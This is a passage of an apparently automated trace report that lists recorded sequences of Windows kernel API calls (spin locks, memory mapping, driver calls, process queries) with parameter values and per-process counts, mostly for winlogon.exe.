| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a782464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a782464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a782464, SpinLock_unk_out = 0xffffe0003a782464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a782464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a782464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c7, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a788010 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000b84, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00032ab6c18, Object_out = 0xffffe0003c1931b0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003c1931b0, ret_val_ptr_out = 0x7fff |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x28, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a787240 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c8359e0, Irp_unk_out = 0xffffe0003c8359e0, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a788250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
Execution Path #43 (length: 6, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 6 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x1fc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x884 |
Execution Path #48 (length: 1, count: 4, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 4 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #49 (length: 19, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 19 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #53 (length: 7, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 7 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmAllocatePagesForMdl | LowAddress_unk = 0x0, HighAddress_unk = 0xffffffffffffffff, SkipBytes_unk = 0x0, TotalBytes_ptr = 0x640000, ret_val_unk_out = 0xffffe0003a775000 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a775000, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xffffd00000000010, ret_val_ptr_out = 0xffffdff441600000 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a775000, AccessMode_unk = 0x1, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xffffd00000000020, ret_val_ptr_out = 0x4620000 |
| MmAllocatePagesForMdl | LowAddress_unk = 0x0, HighAddress_unk = 0xffffffffffffffff, SkipBytes_unk = 0x0, TotalBytes_ptr = 0x40000, ret_val_unk_out = 0xffffe000407da380 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000407da380, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xffffd00000000010, ret_val_ptr_out = 0xffffd00045a00000 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000407da380, AccessMode_unk = 0x1, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xffffd00000000020, ret_val_ptr_out = 0x460000 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #54 (length: 7, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 7 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xfffff80000000010, ret_val_ptr_out = 0xffffd00043ff69e8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x27f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7707c0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #55 (length: 5, count: 109, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 5 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 109 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00043ffaef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #56 (length: 6, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 6 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObReferenceObjectByHandle | Handle_unk = 0x4e8, DesiredAccess_unk = 0x10000000, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xfffff800fc55af28, Object_out = 0xffffe0003c493140, HandleInformation_unk_out = 0xffffd00045a470d0, ret_val_out = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x400, ret_val_ptr_out = 0xffffe0003a76f690 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76f690, Length = 0x400, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0004cbc3820 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0004cbc3820, MemoryDescriptorList_unk_out = 0xffffe0004cbc3820 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0004cbc3820, AccessMode_unk = 0x1, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xffffd00000000010, ret_val_ptr_out = 0x4a0690 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #59 (length: 20, count: 4, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 20 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 4 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b4669f0, Irp_unk_out = 0xffffe0003b4669f0, ret_val_out = 0x103 |
Execution Path #65 (length: 21, count: 16, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 21 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 15 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = * (e.g. 0xfffff800fc55c0b0), ret_val_unk_out = * (e.g. 0x0) |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #67 (length: 14, count: 12, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 14 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 12 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c7, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a787590 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff800010a0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd0002af86b88, Object_out = 0xffffe0003b6db7a0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003b6db7a0, ret_val_ptr_out = 0x7fff |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x28, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af83eb0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b4669f0, Irp_unk_out = 0xffffe0003b4669f0, ret_val_out = 0x103 |
Execution Path #68 (length: 3, count: 15, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 3 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 15 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
Execution Path #69 (length: 12, count: 19, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 19 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd00043feb050 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a763a6c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0004c9e7d00, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0xffffd00043feb050, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd00043feb040, ret_val_unk_out = 0xffffe0003c719010 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c719010, Irp_unk_out = 0xffffe0003c719010, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeWaitForMutexObject | ret_val_out = 0x0 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #70 (length: 16, count: 18, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 16 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 18 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00043ff5040, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00043ff5020, ClientId_deref_UniqueProcess_unk = 0x1fc, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00043ff5000, ProcessHandle_out = 0x4ec, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4ec, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00043ff5098, ret_val_out = 0xc0000004 |
